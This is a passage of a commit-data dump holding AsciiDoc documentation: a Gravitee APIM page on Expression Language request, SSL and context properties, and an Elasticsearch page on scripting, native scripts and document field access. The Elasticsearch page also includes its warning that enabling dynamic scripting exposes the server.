|[,v2,store,MyStore]\n.^|pathInfo |Path info ^.^|string |\/store\/MyStore\n.^|pathInfos |Path info parts ^.^|array of string |[,store,MyStore]\n.^|contextPath |Context path ^.^|string |\/v2\/\n.^|params |Query parameters ^.^|key \/ value |order -> 100\n.^|pathParams |Path parameters ^.^|key \/ value |storeId -> MyStore (__see Warning for details__)\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|method |HTTP method ^.^|string |GET\n.^|scheme |HTTP scheme ^.^|string |http\n.^|version |HTTP version ^.^|string |HTTP_1_1\n.^|timestamp |Timestamp ^.^|long |1602781000267\n.^|remoteAddress |Remote address ^.^|string |0:0:0:0:0:0:0:1\n.^|localAddress |Local address ^.^|string |0:0:0:0:0:0:0:1\n.^|content |Body content ^.^|string |-\n.^|ssl |SSLSession information ^.^|<<SSL Object>> |-\n|===\n\nWARNING: `{#request.content}` is only available for policies bound to an `on-request-content` phase.\n\n=== SSL Object\nThe properties you can access in SSL Session object are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|clientHost |Host name of the client ^.^|string |client.domain.com\n.^|clientPort |Port number of the client ^.^|long |443\n.^|client |Client information ^.^|<<Principal Object>> |-\n.^|server |Server information ^.^|<<Principal Object>> |-\n|===\n\n=== Principal Object\nThe properties you can access in Principal object are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n4+|*Common DN attributes*\n.^|businessCategory |Business category ^.^|string |-\n.^|c |Country code ^.^|string |FR\n.^|cn |Common name ^.^|string |-\n.^|countryOfCitizenship |RFC 3039 CountryOfCitizenship ^.^|string |-\n.^|countryOfResidence |RFC 3039 CountryOfResidence ^.^|string |-\n.^|dateOfBirth |RFC 3039 RFC 3039 DateOfBirth ^.^|string |19830719000000Z\n.^|dc |Domain component ^.^|string |-\n.^|description |Description ^.^|string |-\n.^|dmdName |RFC 2256 directory management domain ^.^|string |-\n.^|dnQualifier |Domain name qualifier ^.^|string |-\n.^|e |Email address in Verisign certificates ^.^|string |-\n.^|emailAddress |Email address (RSA PKCS#9 extension) ^.^|string |-\n.^|gender |RFC 3039 Gender ^.^|string |\"M\", \"F\", \"m\" or \"f\"\n.^|generation |Naming attributes of type X520name ^.^|string |-\n.^|givenname |Naming attributes of type X520name ^.^|string |-\n.^|initials |Naming attributes of type X520name ^.^|string |-\n.^|l |Locality name ^.^|string |-\n.^|name |Name ^.^|string |-\n.^|nameAtBirth |ISIS-MTT NameAtBirth ^.^|string |-\n.^|o |Organization ^.^|string |-\n.^|organizationIdentifier |Organization identifier ^.^|string |-\n.^|ou |Organization unit name ^.^|string |-\n.^|placeOfBirth |RFC 3039 PlaceOfBirth ^.^|string |-\n.^|postalAddress |RFC 3039 PostalAddress ^.^|string |-\n.^|postalCode |Postal code ^.^|string |-\n.^|pseudonym |RFC 3039 Pseudonym ^.^|string |-\n.^|role |Role ^.^|string |-\n.^|serialnumber |Device serial number name ^.^|string |-\n.^|st |State or province name ^.^|string |-\n.^|street |Street ^.^|string |-\n.^|surname |Naming attributes of type X520name ^.^|string |-\n.^|t |Title ^.^|string |-\n.^|telephoneNumber |Telephone number ^.^|string |-\n.^|uid |LDAP User id ^.^|string |-\n.^|uniqueIdentifier |Naming attributes of type X520name ^.^|string |-\n.^|unstructuredAddress |Unstructured address (from PKCS#9) ^.^|string |-\n4+|*Other attributes*\n.^|attributes |Retrieves all attribute values ^.^|key \/ value |\"ou\" -> [\"Test team\", \"Dev team\"]\n.^|defined |Returns true if the principal object is defined and contains values. False otherwise. ^.^|boolean |-\n.^|dn |Full domain name ^.^|string |-\n\n|===\n\nEven if some of these attributes can be arrays, EL will return the first item in the array.\nIf you want to retrieve all values of an attribute, you can use the `attributes` field\n\nIf the principal is not defined, all values are empty.\n\n=== Examples\n\n* Get the value of the `Content-Type` header for an incoming HTTP request:\n`{#request.headers['content-type']}`\n\n* Get the second part of the request path:\n`{#request.paths[1]}`\n\n* Get the client HOST from the SSL session:\n`{#request.ssl.clientHost}`\n\n* Get the client DN from the SSL session:\n`{#request.ssl.client.dn}`\n\n* Get the server organization from the SSL session:\n`{#request.ssl.server.o}`\n\n* Get all the organization units of the server from the SSL session:\n- `{#request.ssl.server.attributes['ou'][0]}`\n- `{#request.ssl.server.attributes['OU'][1]}`\n- `{#request.ssl.server.attributes['Ou'][2]}`\n\n* Get a custom attribute of the client from the SSL session:\n`{#request.ssl.client.attributes['1.2.3.4'][0]}`\n\n* Determine if the SSL attributes of the client are set:\n`{#request.ssl.client.defined}`\n\n== Request context\n\n=== Properties\n\n|===\n|Property |Description |Type |Always present\n\n.^|attributes\n|Request context attributes\n^.^|key-value\n^.^|X\n|===\n\n=== Attributes\nWhen APIM Gateway handles an incoming HTTP request, some attributes are\nautomatically created. These attributes are:\n\n|===\n|Property |Description |Type |Nullable\n\n.^|context-path\n|Context-path\n^.^|string\n^.^|-\n\n.^|resolved-path\n|Resolved-path is the path defined in policies\n^.^|string\n^.^|-\n\n.^|application\n|The authenticated application doing incoming HTTP request\n^.^|string\n^.^|X (for keyless plan)\n\n.^|api\n|Called API\n^.^|string\n^.^|-\n\n.^|user-id\n|The user identifier of incoming HTTP request:\n\n* The subscription id for api-key based plan\n\n* Remote IP for keyless based plan\n\n^.^|string\n^.^|-\n\n.^|plan\n|Plan used to manage incoming HTTP request\n^.^|string\n^.^|-\n\n.^|api-key\n|the api-key used (in case of an api-key based plan)\n^.^|string\n^.^|X (for no api-key plan)\n|===\n\nAdditionally, some policies (like the link:\/apim\/3.x\/apim_policies_oauth2.html#attributes[OAuth2 policy])\nregister other attributes in the context. See the documentation for the policies you are using for more information.\n\n=== Example\n\n* Get the value of the `user-id` attribute for an incoming HTTP request:\n\n`{#context.attributes['user-id']}`\n\n* Get the value of the `plan` attribute for an incoming HTTP request:\n\n`{#context.attributes['plan']}`\n\n* Check that the path starts with a given value:\n\n`{#request.path.startsWith('\/my\/api')}`\n\n== Response\n\n=== Properties\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|content |Body content ^.^|string |-\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|status |Status of the HTTP response ^.^|int |200\n|===\n\n=== Example\n\n* Get the status of an HTTP response:\n`{#response.status}`\n\n== Policies\nYou can use the EL to update some aspects of policy configuration.\nThe policy specifies if it supports EL or not.\n\n== Mixin\n\nIn previous examples, we showed various ways to manipulate objects available\nin the EL context. You can also mix property\nusage to provide an increasingly dynamic configuration.\n\nFor example, we can retrieve the value of an HTTP header where the name\nis based on an API property named `my-property`:\n\n`{#request.headers[#properties['my-property']]}`\n","old_contents":"= Expression Language\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_publisherguide_expression_language.html\n:page-folder: apim\/user-guide\/publisher\n:page-layout: apim3x\n\n== Overview\n\nThe APIM Expression Language (EL for short) is one of the key features\nthat can be used by API publishers to configure various aspects and services of an API.\n\nThe EL is a powerful language used for querying and\nmanipulating an object graph. It is based on the http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/expressions.html[SpEL^] (Spring Expression Language).\nThis means that you can do everything described in the link.\n\nIn addition, APIM extends the standard SpEL capabilities by providing extra objects and properties\ninside the expression language context.\n\n== Usage\nThe basic expression language syntax is as follows:\n\n`{#request.id}`\n\nSee the sections below for example expression notations.\n\n== API\n=== Properties\n\nAs an API publisher, you can define properties for your API. These properties are\nautomatically _injected_ into the expression language context to be used later.\n\n==== Example\n\n* Get the value of the property `my-property` defined in API properties:\n`{#properties['my-property']}`\n\n=== Dictionaries\n\nDictionaries work in a similar way to properties, but you need to specify the dictionary name as well as the property name.\n\n==== Example\n\n* Get the value of the property `my-property` defined in dictionary `my-dictionary`:\n`{#dictionaries['my-dictionary']['my-property']}`\n\n=== Endpoints\nWhen you define endpoints for your API, you need to give them a _name_ which\nmust be a unique identifier across all endpoints of the API. This identifier can be used to get an endpoint reference (i.e. uri).\n\nFor example: when you create an API, a _default_ endpoint is created,\ncorresponding to the value you set for the backend property. This endpoint can\nbe retrieved with EL by using the following syntax:\n\n`{#endpoints['default']}`\n\n== Request\n\nThe properties you can access for API requests are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|id |Identifier ^.^|string |12345678-90ab-cdef-1234-567890ab\n.^|transactionId |Transaction identifier ^.^|string |cd123456-7890-abcd-ef12-34567890\n.^|uri |URI ^.^|string |\/v2\/store\/MyStore?order=100\n.^|path |Path ^.^|string |\/v2\/store\/MyStore\n.^|paths |Path parts ^.^|array of string |[,v2,store,MyStore]\n.^|pathInfo |Path info ^.^|string |\/store\/MyStore\n.^|pathInfos |Path info parts ^.^|array of string |[,store,MyStore]\n.^|contextPath |Context path ^.^|string |\/v2\/\n.^|params |Query parameters ^.^|key \/ value |order -> 100\n.^|pathParams |Path parameters ^.^|key \/ value |storeId -> MyStore (__see Warning for details__)\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|method |HTTP method ^.^|string |GET\n.^|scheme |HTTP scheme ^.^|string |http\n.^|version |HTTP version ^.^|string |HTTP_1_1\n.^|timestamp |Timestamp ^.^|long |1602781000267\n.^|remoteAddress |Remote address ^.^|string |0:0:0:0:0:0:0:1\n.^|localAddress |Local address ^.^|string |0:0:0:0:0:0:0:1\n.^|content |Body content ^.^|string |-\n|===\n\nWARNING: `{#request.content}` is only available for policies bound to an `on-request-content` phase.\n\n=== Example\n\n* Get the value of the `Content-Type` header for an incoming HTTP request:\n`{#request.headers['content-type']}`\n\n* Get the second part of the request path:\n`{#request.paths[1]}`\n\n== Request context\n\n=== Properties\n\n|===\n|Property |Description |Type |Always present\n\n.^|attributes\n|Request context attributes\n^.^|key-value\n^.^|X\n|===\n\n=== Attributes\nWhen APIM Gateway handles an incoming HTTP request, some attributes are\nautomatically created. These attributes are:\n\n|===\n|Property |Description |Type |Nullable\n\n.^|context-path\n|Context-path\n^.^|string\n^.^|-\n\n.^|resolved-path\n|Resolved-path is the path defined in policies\n^.^|string\n^.^|-\n\n.^|application\n|The authenticated application doing incoming HTTP request\n^.^|string\n^.^|X (for keyless plan)\n\n.^|api\n|Called API\n^.^|string\n^.^|-\n\n.^|user-id\n|The user identifier of incoming HTTP request:\n\n* The subscription id for api-key based plan\n\n* Remote IP for keyless based plan\n\n^.^|string\n^.^|-\n\n.^|plan\n|Plan used to manage incoming HTTP request\n^.^|string\n^.^|-\n\n.^|api-key\n|the api-key used (in case of an api-key based plan)\n^.^|string\n^.^|X (for no api-key plan)\n|===\n\nAdditionally, some policies (like the link:\/apim\/3.x\/apim_policies_oauth2.html#attributes[OAuth2 policy])\nregister other attributes in the context. See the documentation for the policies you are using for more information.\n\n=== Example\n\n* Get the value of the `user-id` attribute for an incoming HTTP request:\n\n`{#context.attributes['user-id']}`\n\n* Get the value of the `plan` attribute for an incoming HTTP request:\n\n`{#context.attributes['plan']}`\n\n* Check that the path starts with a given value:\n\n`{#request.path.startsWith('\/my\/api')}`\n\n== Response\n\n=== Properties\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|content |Body content ^.^|string |-\n.^|headers |Headers ^.^|key \/ value |X-Custom -> myvalue\n.^|status |Status of the HTTP response ^.^|int |200\n|===\n\n=== Example\n\n* Get the status of an HTTP response:\n`{#response.status}`\n\n== Policies\nYou can use the EL to update some aspects of policy configuration.\nThe policy specifies if it supports EL or not.\n\n== Mixin\n\nIn previous examples, we showed various ways to manipulate objects available\nin the EL context. You can also mix property\nusage to provide an increasingly dynamic configuration.\n\nFor example, we can retrieve the value of an HTTP header where the name\nis based on an API property named `my-property`:\n\n`{#request.headers[#properties['my-property']]}`\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef24ddd76459cfb96626b3d1bb18bd956897f8fa","subject":"GitHub-26681: Noted new flag for JDK 11+","message":"GitHub-26681: Noted new flag for JDK 11+\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nodes-cluster-resource-configure-jdk.adoc","new_file":"modules\/nodes-cluster-resource-configure-jdk.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6166025bb088d0fea0348759d9f0bd917e935be4","subject":"Correcting gramma","message":"Correcting gramma\n","repos":"aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch","old_file":"docs\/reference\/modules\/scripting.asciidoc","new_file":"docs\/reference\/modules\/scripting.asciidoc","new_contents":"[[modules-scripting]]\n== Scripting\n\nThe scripting module allows to use scripts in order to evaluate custom\nexpressions. For example, scripts can be used to return \"script fields\"\nas part of a search request, or can be used to evaluate a custom score\nfor a query and so on.\n\nThe scripting module uses by default http:\/\/mvel.codehaus.org\/[mvel] as\nthe scripting language with some extensions. mvel is used since it is\nextremely fast and very simple to use, and in most cases, simple\nexpressions are needed (for example, mathematical equations).\n\nAdditional `lang` plugins are provided to allow to execute scripts in\ndifferent languages. Currently supported plugins are `lang-javascript`\nfor JavaScript, `lang-groovy` for Groovy, and `lang-python` for Python.\nAll places where a `script` parameter can be used, a `lang` parameter\n(on the same level) can be provided to define the language of the\nscript. The `lang` options are `mvel`, `js`, `groovy`, `python`, and\n`native`.\n\nadded[1.2.0, Dynamic scripting is disabled by default since version 1.2.0]\n\nTo increase security, Elasticsearch does not allow you to specify scripts with a\nrequest. Instead, scripts must be placed in the `scripts` directory inside the\nconfiguration directory (the directory where elasticsearch.yml is). Scripts\nplaced into this directory will automatically be picked up and be available to\nbe used. Once a script has been placed in this directory, it can be referenced\nby name. For example, a script called `calculate-score.mvel` can be referenced\nin a request like this:\n\n[source,sh]\n--------------------------------------------------\n$ tree config\nconfig\n\u251c\u2500\u2500 elasticsearch.yml\n\u251c\u2500\u2500 logging.yml\n\u2514\u2500\u2500 scripts\n \u2514\u2500\u2500 calculate-score.mvel\n--------------------------------------------------\n\n[source,sh]\n--------------------------------------------------\n$ cat config\/scripts\/calculate-score.mvel\nMath.log(_score * 2) + my_modifier\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\ncurl -XPOST localhost:9200\/_search -d '{\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"match\": {\n \"body\": \"foo\"\n }\n },\n \"functions\": [\n {\n \"script_score\": {\n \"script\": \"calculate-score\",\n \"params\": {\n \"my_modifier\": 8\n }\n }\n }\n ]\n }\n }\n}'\n--------------------------------------------------\n\nThe name of the script is derived from the hierarchy of directories it\nexists under, and the file name without the lang extension. For example,\na script placed under `config\/scripts\/group1\/group2\/test.py` will be\nnamed `group1_group2_test`.\n\n[float]\n=== Default Scripting Language\n\nThe default scripting language (assuming no `lang` parameter is\nprovided) is `mvel`. In order to change it set the `script.default_lang`\nto the appropriate language.\n\n[float]\n=== Enabling dynamic scripting\n\nWe recommend running Elasticsearch behind an application or proxy,\nwhich protects Elasticsearch from the outside world. If users are\nallowed to run dynamic scripts (even in a search request), then they\nhave the same access to your box as the user that Elasticsearch is\nrunning as. For this reason dynamic scripting is disabled by default.\n\nFirst, you should not run Elasticsearch as the `root` user, as this would allow\na script to access or do *anything* on your server, without limitations. Second,\nyou should not expose Elasticsearch directly to users, but instead have a proxy\napplication inbetween. If you *do* intend to expose Elasticsearch directly to\nyour users, then you have to decide whether you trust them enough to run scripts\non your box or not. If you do, you can enable dynamic scripting by adding the\nfollowing setting to the `config\/elasticsearch.yml` file on every node:\n\n[source,yaml]\n-----------------------------------\nscript.disable_dynamic: false\n-----------------------------------\n\nWhile this still allows execution of named scripts provided in the config, or\n_native_ Java scripts registered through plugins, it also allows users to run\narbitrary scripts via the API. Instead of sending the name of the file as the\nscript, the body of the script can be sent instead.\n\n[float]\n=== Automatic Script Reloading\n\nThe `config\/scripts` directory is scanned periodically for changes.\nNew and changed scripts are reloaded and deleted script are removed\nfrom preloaded scripts cache. The reload frequency can be specified\nusing `watcher.interval` setting, which defaults to `60s`.\nTo disable script reloading completely set `script.auto_reload_enabled`\nto `false`.\n\n[float]\n=== Native (Java) Scripts\n\nEven though `mvel` is pretty fast, this allows to register native Java based\nscripts for faster execution.\n\nIn order to allow for scripts, the `NativeScriptFactory` needs to be\nimplemented that constructs the script that will be executed. There are\ntwo main types, one that extends `AbstractExecutableScript` and one that\nextends `AbstractSearchScript` (probably the one most users will extend,\nwith additional helper classes in `AbstractLongSearchScript`,\n`AbstractDoubleSearchScript`, and `AbstractFloatSearchScript`).\n\nRegistering them can either be done by settings, for example:\n`script.native.my.type` set to `sample.MyNativeScriptFactory` will\nregister a script named `my`. Another option is in a plugin, access\n`ScriptModule` and call `registerScript` on it.\n\nExecuting the script is done by specifying the `lang` as `native`, and\nthe name of the script as the `script`.\n\nNote, the scripts need to be in the classpath of elasticsearch. One\nsimple way to do it is to create a directory under plugins (choose a\ndescriptive name), and place the jar \/ classes files there, they will be\nautomatically loaded.\n\n[float]\n=== Score\n\nIn all scripts that can be used in facets, allow to access the current\ndoc score using `doc.score`.\n\n[float]\n=== Computing scores based on terms in scripts\n\nsee <<modules-advanced-scripting, advanced scripting documentation>>\n\n[float]\n=== Document Fields\n\nMost scripting revolve around the use of specific document fields data.\nThe `doc['field_name']` can be used to access specific field data within\na document (the document in question is usually derived by the context\nthe script is used). Document fields are very fast to access since they\nend up being loaded into memory (all the relevant field values\/tokens\nare loaded to memory).\n\nThe following data can be extracted from a field:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Expression |Description\n|`doc['field_name'].value` |The native value of the field. For example,\nif its a short type, it will be short.\n\n|`doc['field_name'].values` |The native array values of the field. For\nexample, if its a short type, it will be short[]. Remember, a field can\nhave several values within a single doc. Returns an empty array if the\nfield has no values.\n\n|`doc['field_name'].empty` |A boolean indicating if the field has no\nvalues within the doc.\n\n|`doc['field_name'].multiValued` |A boolean indicating that the field\nhas several values within the corpus.\n\n|`doc['field_name'].lat` |The latitude of a geo point type.\n\n|`doc['field_name'].lon` |The longitude of a geo point type.\n\n|`doc['field_name'].lats` |The latitudes of a geo point type.\n\n|`doc['field_name'].lons` |The longitudes of a geo point type.\n\n|`doc['field_name'].distance(lat, lon)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceWithDefault(lat, lon, default)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInMiles(lat, lon)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInMilesWithDefault(lat, lon, default)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInKm(lat, lon)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInKmWithDefault(lat, lon, default)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistance(lat, lon)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceWithDefault(lat, lon, default)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInMiles(lat, lon)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInMilesWithDefault(lat, lon, default)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInKm(lat, lon)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInKmWithDefault(lat, lon, default)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].factorDistance(lat, lon)` |The distance factor of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].factorDistance(lat, lon, default)` |The distance factor of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].geohashDistance(geohash)` |The `arc` distance (in meters)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInKm(geohash)` |The `arc` distance (in km)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInMiles(geohash)` |The `arc` distance (in\nmiles) of this geo point field from the provided geohash.\n|=======================================================================\n\n[float]\n=== Stored Fields\n\nStored fields can also be accessed when executing a script. Note, they\nare much slower to access compared with document fields, as they are not\nloaded into memory. They can be simply accessed using\n`_fields['my_field_name'].value` or `_fields['my_field_name'].values`.\n\n[float]\n=== Source Field\n\nThe source field can also be accessed when executing a script. The\nsource field is loaded per doc, parsed, and then provided to the script\nfor evaluation. The `_source` forms the context under which the source\nfield can be accessed, for example `_source.obj2.obj1.field3`.\n\nAccessing `_source` is much slower compared to using `_doc`\nbut the data is not loaded into memory. For a single field access `_fields` may be\nfaster than using `_source` due to the extra overhead of potentially parsing large documents.\nHowever, `_source` may be faster if you access multiple fields or if the source has already been\nloaded for other purposes.\n\n\n[float]\n=== mvel Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`time()` |The current time in milliseconds.\n\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n\n[float]\n=== Arithmetic precision in MVEL\n\nWhen dividing two numbers using MVEL based scripts, the engine tries to\nbe smart and adheres to the default behaviour of java. This means if you\ndivide two integers (you might have configured the fields as integer in\nthe mapping), the result will also be an integer. This means, if a\ncalculation like `1\/num` is happening in your scripts and `num` is an\ninteger with the value of `8`, the result is `0` even though you were\nexpecting it to be `0.125`. You may need to enforce precision by\nexplicitly using a double like `1.0\/num` in order to get the expected\nresult.\n","old_contents":"[[modules-scripting]]\n== Scripting\n\nThe scripting module allows to use scripts in order to evaluate custom\nexpressions. For example, scripts can be used to return \"script fields\"\nas part of a search request, or can be used to evaluate a custom score\nfor a query and so on.\n\nThe scripting module uses by default http:\/\/mvel.codehaus.org\/[mvel] as\nthe scripting language with some extensions. mvel is used since it is\nextremely fast and very simple to use, and in most cases, simple\nexpressions are needed (for example, mathematical equations).\n\nAdditional `lang` plugins are provided to allow to execute scripts in\ndifferent languages. Currently supported plugins are `lang-javascript`\nfor JavaScript, `lang-groovy` for Groovy, and `lang-python` for Python.\nAll places where a `script` parameter can be used, a `lang` parameter\n(on the same level) can be provided to define the language of the\nscript. The `lang` options are `mvel`, `js`, `groovy`, `python`, and\n`native`.\n\nadded[1.2.0, Dynamic scripting is disabled by default since version 1.2.0]\n\nTo increase security, Elasticsearch does not allow you to specify scripts with a\nrequest. Instead, scripts must be placed in the `scripts` directory inside the\nconfiguration directory (the directory where elasticsearch.yml is). Scripts\nplaced into this directory will automatically be picked up and be available to\nbe used. Once a script has been placed in this directory, it can be referenced\nby name. For example, a script called `calculate-score.mvel` can be referenced\nin a request like this:\n\n[source,sh]\n--------------------------------------------------\n$ tree config\nconfig\n\u251c\u2500\u2500 elasticsearch.yml\n\u251c\u2500\u2500 logging.yml\n\u2514\u2500\u2500 scripts\n \u2514\u2500\u2500 calculate-score.mvel\n--------------------------------------------------\n\n[source,sh]\n--------------------------------------------------\n$ cat config\/scripts\/calculate-score.mvel\nMath.log(_score * 2) + my_modifier\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\ncurl -XPOST localhost:9200\/_search -d '{\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"match\": {\n \"body\": \"foo\"\n }\n },\n \"functions\": [\n {\n \"script_score\": {\n \"script\": \"calculate-score\",\n \"params\": {\n \"my_modifier\": 8\n }\n }\n }\n ]\n }\n }\n}'\n--------------------------------------------------\n\nThe name of the script is derived from the hierarchy of directories it\nexists under, and the file name without the lang extension. For example,\na script placed under `config\/scripts\/group1\/group2\/test.py` will be\nnamed `group1_group2_test`.\n\n[float]\n=== Default Scripting Language\n\nThe default scripting language (assuming no `lang` parameter is\nprovided) is `mvel`. In order to change it set the `script.default_lang`\nto the appropriate language.\n\n[float]\n=== Enabling dynamic scripting\n\nWe recommend running Elasticsearch behind an application or proxy,\nwhich protects Elasticsearch from the outside world. If users are\nallowed to run dynamic scripts (even in a search request), then they\nhave the same access to your box as the user that Elasticsearch is\nrunning as. For this reason dynamic scripting is disabled by default.\n\nFirst, you should not run Elasticsearch as the `root` user, as this would allow\na script to access or do *anything* on your server, without limitations. Second,\nyou should not expose Elasticsearch directly to users, but instead have a proxy\napplication inbetween. If you *do* intend to expose Elasticsearch directly to\nyour users, then you have to decide whether you trust them enough to run scripts\non your box or not. If you do, you can enable dynamic scripting by adding the\nfollowing setting to the `config\/elasticsearch.yml` file on every node:\n\n[source,yaml]\n-----------------------------------\nscript.disable_dynamic: false\n-----------------------------------\n\nWhile this still allows execution of named scripts provided in the config, or\n_native_ Java scripts registered through plugins, it also allows users to run\narbitrary scripts via the API. Instead of sending the name of the file as the\nscript, the body of the script can be sent instead.\n\n[float]\n=== Automatic Script Reloading\n\nThe `config\/scripts` directory is scanned periodically for changes.\nNew and changed scripts are reloaded and deleted script are removed\nfrom preloaded scripts cache. The reload frequency can be specified\nusing `watcher.interval` setting, which defaults to `60s`.\nTo disable script reloading completely set `script.auto_reload_enabled`\nto `false`.\n\n[float]\n=== Native (Java) Scripts\n\nEven though `mvel` is pretty fast, this allows to register native Java based\nscripts for faster execution.\n\nIn order to allow for scripts, the `NativeScriptFactory` needs to be\nimplemented that constructs the script that will be executed. There are\ntwo main types, one that extends `AbstractExecutableScript` and one that\nextends `AbstractSearchScript` (probably the one most users will extend,\nwith additional helper classes in `AbstractLongSearchScript`,\n`AbstractDoubleSearchScript`, and `AbstractFloatSearchScript`).\n\nRegistering them can either be done by settings, for example:\n`script.native.my.type` set to `sample.MyNativeScriptFactory` will\nregister a script named `my`. Another option is in a plugin, access\n`ScriptModule` and call `registerScript` on it.\n\nExecuting the script is done by specifying the `lang` as `native`, and\nthe name of the script as the `script`.\n\nNote, the scripts need to be in the classpath of elasticsearch. One\nsimple way to do it is to create a directory under plugins (choose a\ndescriptive name), and place the jar \/ classes files there, they will be\nautomatically loaded.\n\n[float]\n=== Score\n\nIn all scripts that can be used in facets, allow to access the current\ndoc score using `doc.score`.\n\n[float]\n=== Computing scores based on terms in scripts\n\nsee <<modules-advanced-scripting, advanced scripting documentation>>\n\n[float]\n=== Document Fields\n\nMost scripting revolve around the use of specific document fields data.\nThe `doc['field_name']` can be used to access specific field data within\na document (the document in question is usually derived by the context\nthe script is used). Document fields are very fast to access since they\nend up being loaded into memory (all the relevant field values\/tokens\nare loaded to memory).\n\nThe following data can be extracted from a field:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Expression |Description\n|`doc['field_name'].value` |The native value of the field. For example,\nif its a short type, it will be short.\n\n|`doc['field_name'].values` |The native array values of the field. For\nexample, if its a short type, it will be short[]. Remember, a field can\nhave several values within a single doc. Returns an empty array if the\nfield has no values.\n\n|`doc['field_name'].empty` |A boolean indicating if the field has no\nvalues within the doc.\n\n|`doc['field_name'].multiValued` |A boolean indicating that the field\nhas several values within the corpus.\n\n|`doc['field_name'].lat` |The latitude of a geo point type.\n\n|`doc['field_name'].lon` |The longitude of a geo point type.\n\n|`doc['field_name'].lats` |The latitudes of a geo point type.\n\n|`doc['field_name'].lons` |The longitudes 